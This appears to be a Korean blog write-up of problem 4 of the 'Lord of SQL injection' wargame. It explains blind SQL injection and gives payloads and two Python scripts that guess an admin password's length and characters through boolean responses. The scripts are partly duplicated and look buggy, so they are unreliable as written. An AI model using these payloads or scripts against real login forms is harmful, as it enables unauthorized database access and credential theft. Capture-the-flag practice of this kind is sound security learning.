Game/los

Lord of sql injection [4]

los 문제풀이 _ 4번

이번 문제는 전 문제들과 다르게 sql 인젝션 방식이 아닌,

blind sql injection 방법이다.

https://lucete1230-cyberpolice.tistory.com/94?category=851757

▲블라인드 sql이란?

문제는 admin 이라는 id에 일치하는 pw일때 해결된다.

즉 실제 db에 저장되어있는 admin 이라는 계정에 pw를 맞추어야 문제가 해결되는 것이다.

그렇다면 일단 pw의 길이를 알아내고, 후에 substring 함수를 이용해서 한글자씩 맞추는 수밖에 없다.

먼저 'or 1=1# 를 써서 쿼리를 참으로 만들어보았다.

Hello admin이라는 결과가 노출되었다.

'or 1=2 #를 입력하였더니 아무창도 출력되지 않는다.

즉 참 값을 반환하면 위 문장이 뜨는 걸로 참/거짓을 구분 할 수 있다.

los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?id=admin&pw=%27or%20length(pw)=8%20%23

pw='or length(pw)=1# 이런식의 쿼리로 1,2,3,4,...쭉 숫자를 올려주었더니 8일 때

Hello admin이 출력되었다.

이것으로 보아 pw길이는 8이라는 것을 알 수 있다.

import requests
from bs4 import BeautifulSoup

query1 = "\' or length(pw)= %d#"
dbname =[]

# 사용하고 있는 DB 길이 알아내기.
print("========= Blind SQL injection ===========")
print("######################data 분석 중")

for num in range(0,100):
    dbname += [query1 % num]

    cookies = {'PHPSESSID': '2hoip0fomcakckdq57vnc05450', '__cfduid': 'd24d39185c1d300939a1a3990e085cb961598688032'}
    params = {'id': 'admin', 'pw': dbname}
    res = requests.get('https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php', params=params, cookies=cookies)
    code = res.text  # 전체 코드
    search = "Hello admin"  # 참일시 나오는 결과 값

    if search in code:
        print("Password Length : ",num)
        break


print("###########################완료")

위 코드로 pw길이를 구할 수 있다. 8글자 인 경우에는 하나씩 입력해볼 수 있지만,

hash 값 같은 경우 훨씬 그 이상의 값이 들어가므로 파이썬을 공부해보는 것도 좋은 방법인 것 같다.

requets 모듈을 공부하면 될 것 같다!

8글자 라는 것을 알았으니, 한 글자씩 대입하여, pw값을 구하면 된다.

이때는 substring함수를 이용해서 찾아주면 되는데 pw,1,1 즉 첫번째 글자를 알아보는 쿼리이다.

2를 입력하니 hello admin이 출력되었다.

이렇게 8글자를 찾아주면 되는데 0-9/a-z 그외에 특수문자등 섞이게 되면

하나하나 일일이 치기가 힘들다. 그래서 마찬가지로 파이썬 툴을 만들어 보았다.

소스 코드를 보면 이런식으로 html코드를 볼 수 있는데 참인 경우 hello admin 을 출력하니 참고하여

파이썬 툴을 짰다.

import requests
from bs4 import BeautifulSoup

query1 = "\' or substring(pw,%d,1)= %s#"
dbname =[]
word =['a', 'b', 'c', 'd', 'e', 'f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
     'w','x','y','z','1','2','3','4','5','6','7','8','9','0','~','!','@','#','$','%','^','&','*','(',
     ')','_','-','+','=','/',';',':','.',' ',"  ",',','[','{',']','}','&&','|','||','<','>','!!']
#print("상태 코드 : ",res.status_code)

import requests
from bs4 import BeautifulSoup

query1 = "\' or substring(pw,%d,1)= %s#"
dbname =[]
word =['a', 'b', 'c', 'd', 'e', 'f', 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
     'w','x','y','z','1','2','3','4','5','6','7','8','9','0']
#print("상태 코드 : ",res.status_code)

print("========= Blind SQL injection ===========")
# 1. 사용하고 있는 DB 길이 알아내기.

print("######################data 분석 중")

num = 0
while num <= 8:
    num = num+1
    for str in word:
        dbname += [query1 %(num,str)]

        cookies = {'PHPSESSID': '2hoip0fomcakckdq57vnc05450', '__cfduid': 'd24d39185c1d300939a1a3990e085cb961598688032'}
        params = {'id': 'admin', 'pw': dbname}
        res = requests.get('https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php', params=params, cookies=cookies)
        code = res.text  # 전체 코드
        search = "Hello admin"  # 참일시 나오는 결과 값

        if search in code: #코드안에 참일 시 나오는 값이 들어가 있다면
            print("Password : ", str)
            break


print("###########################완료")